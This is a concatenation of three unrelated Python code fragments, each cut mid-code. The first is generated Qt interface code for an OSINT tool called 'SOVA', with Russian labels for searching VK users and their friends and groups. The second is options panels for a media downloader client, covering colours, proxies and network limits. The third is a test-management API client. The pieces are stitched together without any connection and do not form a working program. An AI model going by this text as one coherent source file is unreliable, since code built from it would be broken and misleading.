palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 153, 109))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 153, 109))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.main_Notebook.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Courier New")
self.main_Notebook.setFont(font)
self.main_Notebook.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.IBeamCursor))
self.main_Notebook.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
self.main_Notebook.setAutoFillBackground(False)
self.main_Notebook.setObjectName("main_Notebook")
self.verticalLayout_42.addWidget(self.main_Notebook)
self.verticalLayout.addWidget(self.groupBox_6)
self.groupBox_5 = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox_5.setMinimumSize(QtCore.QSize(0, 100))
self.groupBox_5.setMaximumSize(QtCore.QSize(16777215, 100))
self.groupBox_5.setObjectName("groupBox_5")
self.verticalLayout_43 = QtWidgets.QVBoxLayout(self.groupBox_5)
self.verticalLayout_43.setObjectName("verticalLayout_43")
self.horizontalLayout_35 = QtWidgets.QHBoxLayout()
self.horizontalLayout_35.setObjectName("horizontalLayout_35")
spacerItem44 = QtWidgets.QSpacerItem(20, 11, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_35.addItem(spacerItem44)
self.main_comboBox_style = QtWidgets.QComboBox(self.groupBox_5)
self.main_comboBox_style.setMinimumSize(QtCore.QSize(130, 0))
self.main_comboBox_style.setObjectName("main_comboBox_style")
self.main_comboBox_style.addItem("")
self.main_comboBox_style.addItem("")
self.main_comboBox_style.addItem("")
self.horizontalLayout_35.addWidget(self.main_comboBox_style)
spacerItem45 = QtWidgets.QSpacerItem(20, 11, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_35.addItem(spacerItem45)
self.verticalLayout_43.addLayout(self.horizontalLayout_35)
self.horizontalLayout_34 = QtWidgets.QHBoxLayout()
self.horizontalLayout_34.setObjectName("horizontalLayout_34")
spacerItem46 = QtWidgets.QSpacerItem(52, 14, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_34.addItem(spacerItem46)
self.main_pbChangeStyle = QtWidgets.QPushButton(self.groupBox_5)
self.main_pbChangeStyle.setMinimumSize(QtCore.QSize(100, 0))
self.main_pbChangeStyle.setObjectName("main_pbChangeStyle")
self.horizontalLayout_34.addWidget(self.main_pbChangeStyle)
spacerItem47 = QtWidgets.QSpacerItem(51, 14, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_34.addItem(spacerItem47)
self.verticalLayout_43.addLayout(self.horizontalLayout_34)
self.verticalLayout.addWidget(self.groupBox_5)
self.main_checkBox_sound = QtWidgets.QCheckBox(self.groupBox_3)
font = QtGui.QFont()
font.setPointSize(9)
font.setUnderline(True)
self.main_checkBox_sound.setFont(font)
self.main_checkBox_sound.setObjectName("main_checkBox_sound")
self.verticalLayout.addWidget(self.main_checkBox_sound)
self.verticalLayout_37.addLayout(self.verticalLayout)
self.horizontalLayout_17.addWidget(self.groupBox_3)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1285, 21))
self.menubar.setObjectName("menubar")
self.menu = QtWidgets.QMenu(self.menubar)
self.menu.setObjectName("menu")
self.menu_2 = QtWidgets.QMenu(self.menubar)
self.menu_2.setObjectName("menu_2")
MainWindow.setMenuBar(self.menubar)
self.action_aboutWindow = QtWidgets.QAction(MainWindow)
self.action_aboutWindow.setObjectName("action_aboutWindow")
self.action_startWindow = QtWidgets.QAction(MainWindow)
self.action_startWindow.setObjectName("action_startWindow")
self.action_empty = QtWidgets.QAction(MainWindow)
self.action_empty.setObjectName("action_empty")
self.action_Exit = QtWidgets.QAction(MainWindow)
self.action_Exit.setObjectName("action_Exit")
self.action_showLicenses = QtWidgets.QAction(MainWindow)
self.action_showLicenses.setObjectName("action_showLicenses")
self.action_ErrorsReport = QtWidgets.QAction(MainWindow)
self.action_ErrorsReport.setObjectName("action_ErrorsReport")
self.action_Tray = QtWidgets.QAction(MainWindow)
self.action_Tray.setObjectName("action_Tray")
self.action_Randomisator = QtWidgets.QAction(MainWindow)
self.action_Randomisator.setObjectName("action_Randomisator")
self.menu.addSeparator()
self.menu.addAction(self.action_Tray)
self.menu.addAction(self.action_Exit)
self.menu_2.addAction(self.action_startWindow)
self.menu_2.addAction(self.action_Randomisator)
self.menu_2.addSeparator()
self.menu_2.addAction(self.action_showLicenses)
self.menu_2.addAction(self.action_aboutWindow)
self.menu_2.addAction(self.action_ErrorsReport)
self.menubar.addAction(self.menu.menuAction())
self.menubar.addAction(self.menu_2.menuAction())
self.retranslateUi(MainWindow)
self.tabMain.setCurrentIndex(2)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "OSINT App \"SOVA\""))
self.vk_mainGroup.setTitle(_translate("MainWindow", "Управление"))
self.vk_groupSearchById.setTitle(_translate("MainWindow", "Информация (по id)"))
self.vk_checkFriends.setText(_translate("MainWindow", "друзья"))
self.vk_checkGroups.setText(_translate("MainWindow", "группы"))
self.vk_checkSubs.setText(_translate("MainWindow", "подписки"))
self.vk_checkFollowers.setText(_translate("MainWindow", "подписчики"))
self.vk_checkWall.setText(_translate("MainWindow", "показать стену"))
self.vk_labelSearchByIdRecords.setText(_translate("MainWindow", "запись(ей)"))
self.vk_pbRunSearchById.setText(_translate("MainWindow", " Просмотреть"))
self.vk_groupSearchByName.setTitle(_translate("MainWindow", "Поиск по имени"))
self.vk_CheckAge.setText(_translate("MainWindow", "учитывать возраст"))
self.vk_labelAge.setText(_translate("MainWindow", "Возраст:"))
self.vk_labelAgeFrom.setText(_translate("MainWindow", "От: "))
self.vk_labelAgeTo.setText(_translate("MainWindow", "До: "))
self.vk_chooseOnline.setText(_translate("MainWindow", "сейчас онлайн"))
self.vk_labelAge_2.setText(_translate("MainWindow", "Правило сортировки:"))
self.vk_comboSortRuleUser.setItemText(0, _translate("MainWindow", "популярность"))
self.vk_comboSortRuleUser.setItemText(1, _translate("MainWindow", "дата регистрации"))
self.vk_pbSearchByName.setText(_translate("MainWindow", " Найти"))
self.vk_groupIsMember.setTitle(_translate("MainWindow", "Принадлежность группе"))
self.vk_labelIsMemberUserId.setText(_translate("MainWindow", " user id: "))
self.vk_labelIsMemberGroupId.setText(_translate("MainWindow", " group id: "))
self.vk_pbCheckIsMember.setText(_translate("MainWindow", " Проверить"))
self.vk_groupSearchGroup.setTitle(_translate("MainWindow", "Поиск сообществ по названию"))
self.vk_labelSortRuleGroups.setText(_translate("MainWindow", "Правило сортировки:"))
self.vk_cBoxSortRuleGroups.setItemText(0, _translate("MainWindow", "по умолчанию"))
self.vk_cBoxSortRuleGroups.setItemText(1, _translate("MainWindow", "скорость роста"))
self.vk_cBoxSortRuleGroups.setItemText(2, _translate("MainWindow", "лайки/общ. число"))
self.vk_cBoxSortRuleGroups.setItemText(3, _translate("MainWindow", "посещ-ть/общ. число"))
self.vk_cBoxSortRuleGroups.setItemText(4, _translate("MainWindow", "коммент./общ. число"))
self.vk_cBoxSortRuleGroups.setItemText(5, _translate("MainWindow", "записи/общ. число"))
self.vk_pbRunSearchGroup.setText(_translate("MainWindow", " Найти"))
self.vk_groupIsMember_2.setTitle(_translate("MainWindow", "Статистика по друзьям"))
self.vk_labeGraphics.setText(_translate("MainWindow", " user id: "))
self.vk_pbShowDiagrams.setText(_translate("MainWindow", "Построить график"))
self.vk_pbSaveResult.setText(_translate("MainWindow", " Сохранить результат"))
self.vk_pbClearForm.setText(_translate("MainWindow", " Очистить форму"))
self.ok_groupSearchGroup_3.setTitle(_translate("MainWindow", "Определение ID по ссылке/нику"))
self.vk_pbGetID.setText(_translate("MainWindow", " Получить"))
self.tabMain.setTabText(self.tabMain.indexOf(self.tabVK), _translate("MainWindow", "vk"))
self.gbox_SearchUserName.setTitle(_translate("MainWindow", "Общий по никнейму (SNOOP Project)"))
self.main_pbSearchUser.setText(_translate("MainWindow", " Найти"))
| |
colour_panel = QW.QWidget( self._notebook )
colour_types = []
colour_types.append( CC.COLOUR_THUMB_BACKGROUND )
colour_types.append( CC.COLOUR_THUMB_BACKGROUND_SELECTED )
colour_types.append( CC.COLOUR_THUMB_BACKGROUND_REMOTE )
colour_types.append( CC.COLOUR_THUMB_BACKGROUND_REMOTE_SELECTED )
colour_types.append( CC.COLOUR_THUMB_BORDER )
colour_types.append( CC.COLOUR_THUMB_BORDER_SELECTED )
colour_types.append( CC.COLOUR_THUMB_BORDER_REMOTE )
colour_types.append( CC.COLOUR_THUMB_BORDER_REMOTE_SELECTED )
colour_types.append( CC.COLOUR_THUMBGRID_BACKGROUND )
colour_types.append( CC.COLOUR_AUTOCOMPLETE_BACKGROUND )
colour_types.append( CC.COLOUR_MEDIA_BACKGROUND )
colour_types.append( CC.COLOUR_MEDIA_TEXT )
colour_types.append( CC.COLOUR_TAGS_BOX )
for colour_type in colour_types:
ctrl = ClientGUICommon.BetterColourControl( colour_panel )
ctrl.setMaximumWidth( 20 )
ctrl.SetColour( self._new_options.GetColour( colour_type, colourset ) )
self._gui_colours[ colourset ][ colour_type ] = ctrl
#
rows = []
hbox = QP.HBoxLayout()
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND_SELECTED], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND_REMOTE], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND_REMOTE_SELECTED], CC.FLAGS_VCENTER )
rows.append( ( 'thumbnail background (local: normal/selected, remote: normal/selected): ', hbox ) )
hbox = QP.HBoxLayout()
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER_SELECTED], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER_REMOTE], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER_REMOTE_SELECTED], CC.FLAGS_VCENTER )
rows.append( ( 'thumbnail border (local: normal/selected, remote: normal/selected): ', hbox ) )
rows.append( ( 'thumbnail grid background: ', self._gui_colours[ colourset ][ CC.COLOUR_THUMBGRID_BACKGROUND ] ) )
rows.append( ( 'autocomplete background: ', self._gui_colours[ colourset ][ CC.COLOUR_AUTOCOMPLETE_BACKGROUND ] ) )
rows.append( ( 'media viewer background: ', self._gui_colours[ colourset ][ CC.COLOUR_MEDIA_BACKGROUND ] ) )
rows.append( ( 'media viewer text: ', self._gui_colours[ colourset ][ CC.COLOUR_MEDIA_TEXT ] ) )
rows.append( ( 'tags box background: ', self._gui_colours[ colourset ][ CC.COLOUR_TAGS_BOX ] ) )
gridbox = ClientGUICommon.WrapInGrid( colour_panel, rows )
colour_panel.setLayout( gridbox )
select = colourset == 'default'
self._notebook.addTab( colour_panel, colourset )
if select: self._notebook.setCurrentWidget( colour_panel )
#
coloursets_panel.Add( ClientGUICommon.WrapInText( self._current_colourset, coloursets_panel, 'current colourset: ' ), CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
coloursets_panel.Add( self._notebook, CC.FLAGS_EXPAND_BOTH_WAYS )
vbox = QP.VBoxLayout()
QP.AddToLayout( vbox, coloursets_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
QP.AddToLayout( vbox, QW.QWidget( self ), CC.FLAGS_EXPAND_BOTH_WAYS )
self.setLayout( vbox )
def UpdateOptions( self ):
for colourset in self._gui_colours:
for ( colour_type, ctrl ) in list(self._gui_colours[ colourset ].items()):
colour = ctrl.GetColour()
self._new_options.SetColour( colour_type, colourset, colour )
self._new_options.SetString( 'current_colourset', self._current_colourset.GetValue() )
class _ConnectionPanel( QW.QWidget ):
def __init__( self, parent ):
QW.QWidget.__init__( self, parent )
self._new_options = HG.client_controller.new_options
general = ClientGUICommon.StaticBox( self, 'general' )
self._verify_regular_https = QW.QCheckBox( general )
if self._new_options.GetBoolean( 'advanced_mode' ):
network_timeout_min = 1
network_timeout_max = 86400 * 30
error_wait_time_min = 1
error_wait_time_max = 86400 * 30
max_network_jobs_max = 1000
max_network_jobs_per_domain_max = 100
else:
network_timeout_min = 3
network_timeout_max = 600
error_wait_time_min = 3
error_wait_time_max = 1800
max_network_jobs_max = 30
max_network_jobs_per_domain_max = 5
self._network_timeout = QP.MakeQSpinBox( general, min = network_timeout_min, max = network_timeout_max )
self._network_timeout.setToolTip( 'If a network connection cannot be made in this duration or, if once started, it experiences uninterrupted inactivity for six times this duration, it will be abandoned.' )
self._connection_error_wait_time = QP.MakeQSpinBox( general, min = error_wait_time_min, max = error_wait_time_max )
self._connection_error_wait_time.setToolTip( 'If a network connection times out as above, it will wait increasing multiples of this base time before retrying.' )
self._serverside_bandwidth_wait_time = QP.MakeQSpinBox( general, min = error_wait_time_min, max = error_wait_time_max )
self._serverside_bandwidth_wait_time.setToolTip( 'If a server returns a failure status code indicating it is short on bandwidth, the network job will wait increasing multiples of this base time before retrying.' )
self._max_network_jobs = QP.MakeQSpinBox( general, min = 1, max = max_network_jobs_max )
self._max_network_jobs_per_domain = QP.MakeQSpinBox( general, min = 1, max = max_network_jobs_per_domain_max )
#
proxy_panel = ClientGUICommon.StaticBox( self, 'proxy settings' )
self._http_proxy = ClientGUICommon.NoneableTextCtrl( proxy_panel )
self._https_proxy = ClientGUICommon.NoneableTextCtrl( proxy_panel )
#
self._verify_regular_https.setChecked( self._new_options.GetBoolean( 'verify_regular_https' ) )
self._http_proxy.SetValue( self._new_options.GetNoneableString( 'http_proxy' ) )
self._https_proxy.SetValue( self._new_options.GetNoneableString( 'https_proxy' ) )
self._network_timeout.setValue( self._new_options.GetInteger( 'network_timeout' ) )
self._connection_error_wait_time.setValue( self._new_options.GetInteger( 'connection_error_wait_time' ) )
self._serverside_bandwidth_wait_time.setValue( self._new_options.GetInteger( 'serverside_bandwidth_wait_time' ) )
self._max_network_jobs.setValue( self._new_options.GetInteger( 'max_network_jobs' ) )
self._max_network_jobs_per_domain.setValue( self._new_options.GetInteger( 'max_network_jobs_per_domain' ) )
#
if self._new_options.GetBoolean( 'advanced_mode' ):
label = 'As you are in advanced mode, these options have very low and high limits. Be very careful about lowering delay time or raising max number of connections too far, as things will break.'
st = ClientGUICommon.BetterStaticText( general, label = label )
st.setObjectName( 'HydrusWarning' )
st.setWordWrap( True )
general.Add( st, CC.FLAGS_EXPAND_PERPENDICULAR )
rows = []
rows.append( ( 'network timeout (seconds): ', self._network_timeout ) )
rows.append( ( 'connection error retry wait (seconds): ', self._connection_error_wait_time ) )
rows.append( ( 'serverside bandwidth retry wait (seconds): ', self._serverside_bandwidth_wait_time ) )
rows.append( ( 'max number of simultaneous active network jobs: ', self._max_network_jobs ) )
rows.append( ( 'max number of simultaneous active network jobs per domain: ', self._max_network_jobs_per_domain ) )
rows.append( ( 'BUGFIX: verify regular https traffic:', self._verify_regular_https ) )
gridbox = ClientGUICommon.WrapInGrid( general, rows )
general.Add( gridbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
text = 'Enter strings such as "http://ip:port" or "http://user:pass@ip:port". It should take affect immediately on dialog ok.'
text += os.linesep * 2
if ClientNetworkingSessions.SOCKS_PROXY_OK:
text += 'It looks like you have socks support! You should also be able to enter (socks4 or) "socks5://ip:port".'
text += os.linesep
text += 'Use socks4a or socks5h to force remote DNS resolution, on the proxy server.'
else:
text += 'It does not look like you have socks support! If you want it, try adding "pysocks" (or "requests[socks]")!'
st = ClientGUICommon.BetterStaticText( proxy_panel, text )
st.setWordWrap( True )
proxy_panel.Add( st, CC.FLAGS_EXPAND_PERPENDICULAR )
rows = []
rows.append( ( 'http: ', self._http_proxy ) )
rows.append( ( 'https: ', self._https_proxy ) )
gridbox = ClientGUICommon.WrapInGrid( proxy_panel, rows )
proxy_panel.Add( gridbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
#
vbox = QP.VBoxLayout()
QP.AddToLayout( vbox, general, CC.FLAGS_EXPAND_PERPENDICULAR )
QP.AddToLayout( vbox, proxy_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
QP.AddToLayout( vbox, QW.QWidget( self ), CC.FLAGS_EXPAND_BOTH_WAYS )
self.setLayout( vbox )
def UpdateOptions( self ):
self._new_options.SetBoolean( 'verify_regular_https', self._verify_regular_https.isChecked() )
self._new_options.SetNoneableString( 'http_proxy', self._http_proxy.GetValue() )
self._new_options.SetNoneableString( 'https_proxy', self._https_proxy.GetValue() )
self._new_options.SetInteger( 'network_timeout', self._network_timeout.value() )
self._new_options.SetInteger( 'connection_error_wait_time', self._connection_error_wait_time.value() )
self._new_options.SetInteger( 'serverside_bandwidth_wait_time', self._serverside_bandwidth_wait_time.value() )
self._new_options.SetInteger( 'max_network_jobs', self._max_network_jobs.value() )
self._new_options.SetInteger( 'max_network_jobs_per_domain', self._max_network_jobs_per_domain.value() )
class _DownloadingPanel( QW.QWidget ):
def __init__( self, parent, new_options ):
QW.QWidget.__init__( self, parent )
self._new_options = new_options
#
gallery_downloader = ClientGUICommon.StaticBox( self, 'gallery downloader' )
gug_key_and_name = HG.client_controller.network_engine.domain_manager.GetDefaultGUGKeyAndName()
self._default_gug = ClientGUIImport.GUGKeyAndNameSelector( gallery_downloader, gug_key_and_name )
self._gallery_page_wait_period_pages = QP.MakeQSpinBox( gallery_downloader, min=1, max=120 )
self._gallery_file_limit = ClientGUICommon.NoneableSpinCtrl( gallery_downloader, none_phrase = 'no limit', min = 1, max = 1000000 )
self._highlight_new_query = QW.QCheckBox( gallery_downloader )
#
subscriptions = ClientGUICommon.StaticBox( self, 'subscriptions' )
self._gallery_page_wait_period_subscriptions = QP.MakeQSpinBox( subscriptions, min=1, max=30 )
self._max_simultaneous_subscriptions = QP.MakeQSpinBox( subscriptions, min=1, max=100 )
self._subscription_file_error_cancel_threshold = ClientGUICommon.NoneableSpinCtrl( subscriptions, min = 1, max = 1000000, unit = 'errors' )
self._subscription_file_error_cancel_threshold.setToolTip( 'This is a simple patch and will be replaced with a better "retry network errors later" system at some point, but is useful to increase if you have subs to unreliable websites.' )
self._process_subs_in_random_order = QW.QCheckBox( subscriptions )
self._process_subs_in_random_order.setToolTip( 'Processing in random order is useful whenever bandwidth is tight, as it stops an \'aardvark\' subscription from always getting first whack at what is available. Otherwise, they will be processed in alphabetical order.' )
checker_options = self._new_options.GetDefaultSubscriptionCheckerOptions()
self._subscription_checker_options = ClientGUIImport.CheckerOptionsButton( subscriptions, checker_options )
#
watchers = ClientGUICommon.StaticBox( self, 'watchers' )
self._watcher_page_wait_period = QP.MakeQSpinBox( watchers, min=1, max=120 )
self._highlight_new_watcher = QW.QCheckBox( watchers )
checker_options = self._new_options.GetDefaultWatcherCheckerOptions()
self._watcher_checker_options = ClientGUIImport.CheckerOptionsButton( watchers, checker_options )
#
misc = ClientGUICommon.StaticBox( self, 'misc' )
self._pause_character = QW.QLineEdit( misc )
self._stop_character = QW.QLineEdit( misc )
self._show_new_on_file_seed_short_summary = QW.QCheckBox( misc )
self._show_deleted_on_file_seed_short_summary = QW.QCheckBox( misc )
if self._new_options.GetBoolean( 'advanced_mode' ):
delay_min = 1
else:
delay_min = 600
self._subscription_network_error_delay = ClientGUITime.TimeDeltaButton( misc, min = delay_min, days = True, hours = True, minutes = True, seconds = True )
| |
status or response.get("status")
}
if folder is not None:
folder = f"/{folder}".replace("//", "/")
self.create_folder(project_key=response["projectKey"], folder_type=TEST_CASE, folder_name=folder)
request_data["folder"] = folder if folder != "/" else None
# append labels and issue links to the current list or create new ones
update_field(response.get("labels", []), request_data, "labels", labels)
update_field(response.get("issueLinks", []), request_data, "issueLinks", issue_links)
# handle custom fields
update_multiline_field(response.get("customFields", {}).get("ci_server_url", ""), request_data, "ci_server_url", build_urls)
update_multiline_field(response.get("customFields", {}).get("code_base_url", ""), request_data, "code_base_url", code_bases)
self._logger.debug("Updating data of test case '%s'", test_case_key)
return bool(self._put(request_url, request_data))
def delete_test_case(self, test_case_key: str) -> bool:
"""
Delete given test case.
:param test_case_key: Test case key to be deleted. ex. "<KEY>"
:returns: True if succeeded, False if not
"""
request_url = f"{self._adaptavist_api_url}/testcase/{test_case_key}"
self._logger.debug("Deleting test case %s)", test_case_key)
return bool(self._delete(request_url))
def get_test_case_links(self, issue_key: str) -> List[Dict[str, str]]:
"""
Get the list of test cases linked to an issue.
:param issue_key: Issue key to look for
:returns: List of linked test cases
"""
request_url = f"{self._adaptavist_api_url}/issuelink/{issue_key}/testcases"
self._logger.debug("Getting list of issues linked to %s", issue_key)
request = self._get(request_url)
return request.json() if request else []
def link_test_cases(self, issue_key: str, test_case_keys: List[str]) -> bool:
"""
Link a list of existing testcases to an issue.
:param issue_key: Issue to link the test cases to
:param test_case_keys: List of test case keys to be linked to the issue
:returns: True if succeeded, False if not
"""
for test_case_key in test_case_keys:
response = self.get_test_case(test_case_key)
if not response:
self._logger.warning("Test case %s was not found", test_case_key)
continue
# append issue to the current list of issue links
request_url = f"{self._adaptavist_api_url}/testcase/{test_case_key}"
issue_links = response.get("issueLinks", [])
if issue_key not in issue_links:
issue_links.append(issue_key)
request_data = {"issueLinks": issue_links}
self._logger.debug("Adding links to test case %s", test_case_key)
